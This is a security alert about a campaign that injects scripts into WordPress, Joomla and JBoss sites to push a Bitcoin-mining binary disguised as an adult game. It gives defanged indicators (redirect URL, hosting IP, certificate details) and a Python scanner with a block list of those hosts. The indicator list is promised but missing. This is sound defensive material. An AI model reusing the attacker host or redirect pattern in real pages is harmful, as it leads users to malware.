Security Alert: Attackers Using Script Injection to Spread Bitcoin-Mining Malware


Security researchers recently analyzed various spam campaigns and discovered a new one, tied to the Bitcoin cryptocurrency, that is affecting a large number of websites.

Over the past months, Bitcoin has gained a great deal of attention and reached high price levels, followed by various fluctuations. Mining consists of verifying other users' Bitcoin transactions, for which the miner is rewarded, and it is what keeps the transaction ledger safe and secure.

How the infection is spread

During this spam campaign, online criminals try to inject a malicious script into legitimate websites running WordPress, Joomla, and JBoss. They hide the unwanted script in the compromised site so that visitors are led to download a binary file. Once that binary runs, the attackers use the victim's CPU to mine Bitcoin on their behalf.

In short, when visitors access a website that hosts the malicious script, their PC's CPU is used to mine Bitcoin for the cyber attackers. The binary also collects information from any Bitcoin wallet installed on the compromised machine.

Here is how the malicious script is injected, with a reference to the following site (sanitized for your own protection):

http: // online-game-18 [.] xyz /? c = 41-149-20180219062557833d27348 & pst = 2 & key = [uniktID]
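The injection described above can be hunted for in a site's own pages. The following is an added example, not code from the alert, CSIS or Heimdal: it parses the script tags of a page and flags references to the campaign's redirect host, to the hosting server named later in this alert, or to any URL whose query carries the c/pst/key shape shown above. The sample HTML and the key value are constructed, and the block list is an assumption to extend with your own indicators.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs

# Indicators from the alert, refanged: the redirect host and the server hosting it.
BLOCKED_HOSTS = {"online-game-18.xyz", "212.224.118.40"}
# The landing URL carried c=<campaign>&pst=2&key=<per-victim id>: flag any script URL
# whose query has that shape, even on a host that is not yet in the block list.
REDIRECT_PARAMS = {"c", "pst", "key"}

class ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            self._in_script = src is None  # an inline body follows
            if src:
                self.srcs.append(src)

    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)

def suspicious_url(url):
    """True if the URL points at a blocked host or matches the campaign's query shape."""
    parsed = urlparse(url if "://" in url else "http://" + url.lstrip("/"))
    host = (parsed.hostname or "").lower()
    return host in BLOCKED_HOSTS or REDIRECT_PARAMS <= set(parse_qs(parsed.query))

def scan_html(html):
    """Return the script URLs in the page that look like the injected miner redirect."""
    collector = ScriptCollector()
    collector.feed(html)
    hits = [s for s in collector.srcs if suspicious_url(s)]
    for body in collector.inline:  # URLs buried in inline JavaScript
        hits += [u for u in re.findall(r"https?://[^\s'\"<>]+", body) if suspicious_url(u)]
    return hits

# Constructed sample page (not from the campaign): one benign script, two injected ones.
SAMPLE_PAGE = """<html><head>
<script src="/wp-includes/js/jquery.js"></script>
<script src="http://online-game-18.xyz/?c=41-149-20180219062557833d27348&pst=2&key=abc123"></script>
<script>var u="https://212.224.118.40/stage.js";document.write('<script src="'+u+'"><\\/script>');</script>
</head><body>Hello</body></html>"""
```

Run scan_html over each saved page or template of the site; a non-empty result is the injected reference to clean out and the site's integrity to review.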

The package file offered to potential victims is presented as an adult game named “The # 1 Adult Game – Free to Play” and contains an executable named “setup_sex_game.exe”.

The binary package is digitally signed with a code-signing certificate issued by Comodo, with the following details:

Status: Valid
Issuer: COMODO RSA Code Signing CA
Valid from: 1:00 AM 2/15/2018 to 12:59 AM 2/16/2019
Valid use: Code Signing
Algorithm: sha256RSA
Thumbprint: 9FB7FD71BB7DA9C256E872CB56E3808E811990BB
Serial number: 66 CA 14 17 72 9E 0A BB D8 F9 80 08 A3 97 4B B4

The above domain is hosted on this server (sanitized for your own protection): 212.224.118 [.] 40. Security researchers discovered that the same server is linked with other Bitcoin mining domains, which carry the same offer of a free game. Here’s a list of those malicious domains:


Heimdal Security proactively blocked all infected sites, so all Heimdal PRO and Heimdal CORP users are protected.

According to VirusTotal, only 16 antivirus engines out of 68 detected the binary package file at the time of writing.

[Screenshot: VirusTotal detection results for the Bitcoin miner]

How to protect yourself against malicious script injections

The main issue with this Bitcoin mining malware is that it behaves like fileless malware and usually goes undetected by traditional antivirus products. By injecting a malicious script, hackers can redirect users to a compromised site and steal their sensitive data. This is why we strongly recommend that users:

  • Apply all available updates for your apps (especially the most exposed ones: Flash, Java and browsers), software programs and operating system. Do NOT postpone or neglect keeping your system fully patched; keeping the OS up to date is the best thing users can do for their safety.
  • Be very careful when clicking on suspicious links or websites, and always check that the web page’s URL is genuine.
  • Make sure the sites you access use a security certificate (HTTPS) to reduce the risk of malware infection.
  • Install a reliable antivirus program on your computer to protect your valuable data from online threats.
  • Consider adding multiple layers of protection and also use a proactive cyber security software solution.
  • Probably one of the best security measures anyone can take is to learn how to recognize various online threats. We recommend reading these free educational resources to gain more knowledge about the cyber security industry.


*This article features cyber intelligence provided by CSIS Security Group researchers.
